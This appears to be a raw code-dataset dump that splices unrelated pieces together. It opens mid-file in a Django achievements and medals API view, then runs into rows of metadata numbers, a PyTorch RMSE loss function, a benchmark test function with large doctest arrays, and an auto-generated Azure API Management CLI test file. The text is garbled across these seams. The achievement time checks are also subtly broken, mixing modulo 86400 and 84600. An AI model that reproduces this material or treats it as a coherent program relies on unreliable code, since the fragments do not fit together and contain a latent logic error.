if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#check which exercises where done in the night
for a in all:
if ((a.date % 86400) > NIGHT_START) and ((a.date % 84600) < NIGHT_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#earlyBird
if not Achievement.objects.filter(name='earlyBird').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'earlyBird_0.svg","1":"' + ROOT_PATH + 'earlyBird_1.svg"}'
Achievement.objects.create(name='earlyBird', title='{"en":"Early Bird","de":"Der frühe Vogel.."}', description='{"en": "Do an exercise early in the morning (between 6 AM and 8 AM)", "de": "Mache eine Übung frühmorgens (zwischen 6 und 8 Uhr)"}', hidden=True, icon=icon_dict)
achievement = Achievement.objects.get(name='earlyBird')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
found = False
#get all exercises
all = DoneExercises.objects.filter(user=user)
#check which ones where done erly in the morning
for a in all:
if ((a.date % 86400) > NIGHT_END) and ((a.date % 84600) < EARLY_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#streak
if not Achievement.objects.filter(name='streak').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'streak_0.svg","1":"' + ROOT_PATH + 'streak_1.svg","2":"' + ROOT_PATH + 'streak_2.svg","3":"' + ROOT_PATH + 'streak_3.svg","4":"' + ROOT_PATH + 'streak_4.svg"}'
Achievement.objects.create(name='streak', title='{"en":"Streak","de":"Streak"}', description='{"en": "Reach a streak", "de": "Erreiche eine Streak"}', icon=icon_dict)
achievement = Achievement.objects.get(name='streak')
#check if achievement already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user, level=4).exists():
#get users streak
streak = user.streak
#check which level is reached
if streak >= 90:
res = AchievementHandler.upgrade_level(user, achievement, 4)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 4,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(4, achievement.icon)
})
elif streak >= 30:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': str(streak)+'/90',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif streak >= 7:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(streak)+'/30',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif streak >= 3:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(streak)+'/7',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#check if new achieved
if len(achieved) == 0:
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
else:
data = {
'success': True,
'description': 'new achieved',
'data': {
'achievements': achieved
}
}
return Response(data)
class GetMedals(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#check if user
if not info['account_type'] == 'user':
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
medals = UserMedalInExercise.objects.filter(user=user)
output = []
for mex in medals:
output.append({
'exercise': mex.exercise.title,
'gold': mex.gold,
'silver': mex.silver,
'bronze': mex.bronze
})
data = {
'success': True,
'description': 'returning medals',
'data': {
'medals': output
}
}
return Response(data)
| 50.835512
| 294
| 0.482911
| 3,806
| 46,667
| 5.815292
| 0.059905
| 0.037952
| 0.050603
| 0.068314
| 0.93015
| 0.921339
| 0.915646
| 0.913794
| 0.907288
| 0.905119
| 0
| 0.012857
| 0.413333
| 46,667
| 918
| 295
| 50.835512
| 0.795566
| 0.034157
| 0
| 0.843256
| 0
| 0.009721
| 0.153725
| 0.016619
| 0
| 0
| 0
| 0.001089
| 0
| 1
| 0.00486
| false
| 0
| 0.008505
| 0
| 0.065614
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8f551e28c10c64b7eeaf69d23999e1cd53dfddc
| 193
|
py
|
Python
|
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
model/loss.py
|
theLongLab/group-lasso-nn
|
6d7b9ffe2867b0efe99d6062bbb8b09ec12155c2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import torch
import torch.nn.functional as F
def rmse(output: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
return torch.sqrt(F.mse_loss(output, target))
| 19.3
| 69
| 0.699482
| 29
| 193
| 4.62069
| 0.62069
| 0.246269
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006098
| 0.150259
| 193
| 9
| 70
| 21.444444
| 0.810976
| 0.108808
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2b0b1cad151586a748e966c409fdcd77263b2572
| 5,656
|
py
|
Python
|
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | 1
|
2020-12-30T23:04:51.000Z
|
2020-12-30T23:04:51.000Z
|
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
MDAF/TestFunctions/Periodic.py
|
ejeanboris/MDAF_COMPLETE
|
e99c9762ea7304acc0a6795d33a55449a9800d89
|
[
"CC0-1.0"
] | null | null | null |
import math
def main(args):
'''
>>> (main([0,0]) - 0.9)<0.001
True
#_# dimmensions: 2
#_# upper: 10
#_# lower: -10
#_# minimum: [0,0]
#_# opti: 0.9
#_# cm_angle: array([[1.75593580e+00], [2.65321236e-01], [4.87617228e-01], [2.59067658e-01], [1.31559946e+02], [4.22034384e+01], [8.81116275e-01], [6.32096982e-02], [0.00000000e+00], [6.81000000e-01]])
#_# cm_conv: array([[0.28846154], [0.32692308], [0.46153846], [0.53846154], [0. ], [0.13 ]])
#_# cm_grad: array([[0.27864322], [0.13841195], [0. ], [0.433 ]])
#_# ela_conv: array([[4.16000000e-01], [0.00000000e+00], [9.44507865e-02], [4.63473862e-01], [1.00000000e+03], [2.05200000e+00]])
#_# ela_curv: array([[1.96335006e-02], [7.90494696e-01], [9.40517924e-01], [9.70508422e-01], [1.15146017e+00], [1.40827470e+00], [2.96278026e-01], [0.00000000e+00], [1.00042900e+00], [1.20667873e+00], [1.37489634e+01], [1.74597326e+00], [3.87776532e+00], [1.54010785e+03], [1.10794257e+02], [0.00000000e+00], [1.00004273e+00], [1.15887166e+00], [6.45569964e+00], [1.65200491e+00], [3.28908531e+00], [2.84602626e+02], [2.66078823e+01], [0.00000000e+00], [8.40000000e+03], [7.87500000e+00]])
#_# ela_distr: array([[ 0.10282964], [-0.79626524], [ 4. ], [ 0. ], [ 0.066 ]])
#_# ela_local: array([[9.00000000e+01], [9.00000000e-01], [9.04018379e-01], [9.55549808e-01], [1.00000000e-02], [1.11235955e-02], [1.00000000e-02], [2.50000000e+01], [3.00000000e+01], [4.13500000e+01], [4.00000000e+01], [4.50000000e+01], [9.00000000e+01], [1.30239678e+01], [4.22500000e+03], [2.58300000e+00]])
#_# ela_meta: array([[-5.92296020e-03], [ 1.95370338e+00], [ 3.86726095e-04], [ 1.04562694e-03], [ 2.70379204e+00], [-7.97249787e-03], [ 1.22049304e-02], [ 1.04972191e+00], [ 1.38023108e-05], [ 0.00000000e+00], [ 5.90000000e-02]])
#_# basic: array([[ 2.00000000e+00], [ 5.00000000e+02], [-1.00000000e+01], [-1.00000000e+01], [ 1.00000000e+01], [ 1.00000000e+01], [ 1.00605701e+00], [ 2.99797225e+00], [ 6.00000000e+00], [ 6.00000000e+00], [ 3.60000000e+01], [ 3.60000000e+01], [ 1.00000000e+00], [ 0.00000000e+00], [ 1.00000000e-03]])
#_# disp: array([[1.24018699], [1.09742031], [1.05147535], [1.03706056], [1.2976655 ], [1.10184985], [1.01192384], [1.01497513], [2.50946641], [1.0178444 ], [0.53781287], [0.38720762], [3.0525099 ], [1.04445318], [0.12227698], [0.15356744], [0. ], [0.047 ]])
#_# limo: array([[ 1.02009742e-02], [ 7.78878285e-02], [ 2.22441463e-01], [ 9.89624222e-02], [-1.80105180e-01], [-1.10989188e-01], [ 7.45768785e+00], [ 2.52375269e+01], [ 1.00637086e+00], [ 1.05016349e+00], [ 1.74039998e-01], [ 7.14744674e-01], [ 0.00000000e+00], [ 2.45000000e-01]])
#_# nbc: array([[ 0.10083485], [ 0.69048795], [ 0.09078319], [ 0.26259763], [-0.63877451], [ 0. ], [ 0.237 ]])
#_# pca: array([[1. ], [1. ], [0.66666667], [1. ], [0.50356834], [0.5035681 ], [0.50162655], [0.33870974], [0. ], [0.012 ]])
#_# gcm: array([[5. ], [0.13888889], [0.86111111], [0.55555556], [0.11298693], [0.2 ], [0.22371662], [0.31365693], [0.08447559], [0.02777778], [0.08888889], [0.05555556], [0.16666667], [0.06022079], [0.44444444], [0.05555556], [0.2 ], [0.22222222], [0.33333333], [0.11520245], [1. ], [0.23060847], [0.02777778], [0. ], [0.177 ], [3. ], [0.08333333], [0.91666667], [0.33333333], [0.12484877], [0.33333333], [0.24342663], [0.6317246 ], [0.26512862], [0.05555556], [0.22222222], [0.13888889], [0.47222222], [0.22047928], [0.66666667], [0.11111111], [0.33333333], [0.22222222], [0.66666667], [0.29397237], [1. ], [0.6317246 ], [0.02777778], [0. ], [0.174 ], [6. ], [0.16666667], [0.83333333], [0.66666667], [0.08031645], [0.16666667], [0.15416039], [0.28511054], [0.09222196], [0.02777778], [0.05555556], [0.02777778], [0.11111111], [0.04303315], [0.33333333], [0.05555556], [0.16666667], [0.15277778], [0.30555556], [0.10971343], [1. ], [0.21749947], [0.02777778], [0. ], [0.19 ]])
#_# ic: array([[ 0.84108627], [ 0.10510511], [ 0.35038422], [-0.25525526], [ 0.51004016], [ 0. ], [ 1.611 ]])
#_# Represented: 1
'''
return 1 + (math.sin(args[0]))**2 + (math.sin(args[1]))**2 - 0.1*math.exp(-1*(args[0]**2+args[1]**2))
if __name__ == "__main__":
import doctest
doctest.testmod()
| 145.025641
| 1,511
| 0.443069
| 633
| 5,656
| 3.900474
| 0.333333
| 0.015796
| 0.038882
| 0.022681
| 0.035237
| 0.019846
| 0.019846
| 0.019846
| 0.019846
| 0.019846
| 0
| 0.555436
| 0.342999
| 5,656
| 38
| 1,512
| 148.842105
| 0.108988
| 0.968352
| 0
| 0
| 0
| 0
| 0.038278
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2b1a03c768dfcf9e83f715b3d080881f4eeb9cbc
| 112,915
|
py
|
Python
|
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
generated/azure-cli/apim/tests/latest/test_apim_scenario.py
|
audevbot/autorest.devops.debug
|
a507fb6e2dd7826212537f27d583f203aac1c28f
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
TEST_DIR = os.path.abspath(os.path.join(os.path.abspath(__file__), '..'))
class ApimgmtScenarioTest(ScenarioTest):
@ResourceGroupPreparer(name_prefix='cli_test_apimgmt')
def test_apimgmt(self, resource_group):
self.kwargs.update({
'name': 'test1'
})
# create_or_update -- create
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml" --format "openapi-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "http://petstore.swagger.io/v2/swagger.json" --format "swagger-link-json"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "collector" --value "https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl" --format "wadl-link-json"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link" --api-type "soap"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "apidescription5200" --display-name "apiname1463" --service-url "http://newechoapi.cloudapp.net/api" --path "newapiPath"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3" --api-revision-description "Creating a Revision of an existing API" --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --service-url "http://echoapi.cloudapp.net/apiv3" --path "echo"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3" --description "Create Echo API into a new Version using Existing Version Set and Copy all Operations." --api-version "v4" --is-current true --api-version-set-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apiVersionSets/{{ api_version_set_name }}" --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2" --description "Copy of Existing Echo Api including Operations." --is-current true --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." --display-name "Swagger Petstore" --service-url "http://petstore.swagger.io/v2" --path "petstore"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "apidocs" --service-url "http://petstore.swagger.wordnik.com/api" --path "petstoreapi123" --value "http://apimpimportviaurl.azurewebsites.net/api/apidocs/" --format "swagger-link"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --display-name "Echo API New" --service-url "http://echoapi.cloudapp.net/api2" --path "newecho"', checks=[
])
self.cmd('apim api create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# create_or_update -- update
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml" --format "openapi-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "petstore" --value "http://petstore.swagger.io/v2/swagger.json" --format "swagger-link-json"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "petstore" --path "collector" --value "https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl" --format "wadl-link-json"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "soapApi" --path "currency" --value "http://www.webservicex.net/CurrencyConvertor.asmx?WSDL" --format "wsdl-link" --api-type "soap"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "apidescription5200" --display-name "apiname1463" --service-url "http://newechoapi.cloudapp.net/api" --path "newapiPath"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3" --api-revision-description "Creating a Revision of an existing API" --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --service-url "http://echoapi.cloudapp.net/apiv3" --path "echo"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3" --description "Create Echo API into a new Version using Existing Version Set and Copy all Operations." --api-version "v4" --is-current true --api-version-set-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apiVersionSets/{{ api_version_set_name }}" --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2" --description "Copy of Existing Echo Api including Operations." --is-current true --subscription-required true --source-api-id "/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group }}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{ api_name }}" --display-name "Echo API2" --service-url "http://echoapi.cloudapp.net/api" --path "echo2"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup" --description "This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters." --display-name "Swagger Petstore" --service-url "http://petstore.swagger.io/v2" --path "petstore"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "apidocs" --service-url "http://petstore.swagger.wordnik.com/api" --path "petstoreapi123" --value "http://apimpimportviaurl.azurewebsites.net/api/apidocs/" --format "swagger-link"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --display-name "Echo API New" --service-url "http://echoapi.cloudapp.net/api2" --path "newecho"', checks=[
])
self.cmd('apim api update --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# delete -- delete
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "apidocs"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api delete --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# list_by_tags -- list
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# list_by_service -- list
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
self.cmd('apim api list --resource-group "rg1" --service-name "apimService1"', checks=[
])
# get -- show
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "petstore"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "soapApi"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api;rev=3"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echoapiv3"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api2"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "tempgroup"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "apidocs"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
self.cmd('apim api show --resource-group "rg1" --service-name "apimService1" --api-id "echo-api"', checks=[
])
# create_or_update -- create
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release create --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# create_or_update -- update
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev" --notes "yahooagain"', checks=[
])
self.cmd('apim api release update --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# delete -- delete
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release delete --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# list_by_service -- list
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "a1"', checks=[
])
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "a1"', checks=[
])
self.cmd('apim api release list --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d"', checks=[
])
# get -- show
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "a1" --release-id "testrev"', checks=[
])
self.cmd('apim api release show --resource-group "rg1" --service-name "apimService1" --api-id "5a5fcc09124a7fa9b89f2f1d" --release-id "testrev"', checks=[
])
# create_or_update -- create
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "PetStoreTemplate2" --operation-id "newoperations" --description "This can only be done by the logged in user." --display-name "createUser2" --method "POST" --url-template "/user1"', checks=[
])
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "echo-api" --operation-id "operationId" --display-name "Retrieve resource" --method "GET" --url-template "/resource"', checks=[
])
self.cmd('apim api operation create --resource-group "rg1" --service-name "apimService1" --api-id "57d2ef278aa04f0888cba3f3" --operation-id "57d2ef278aa04f0ad01d6cdc"', checks=[
])
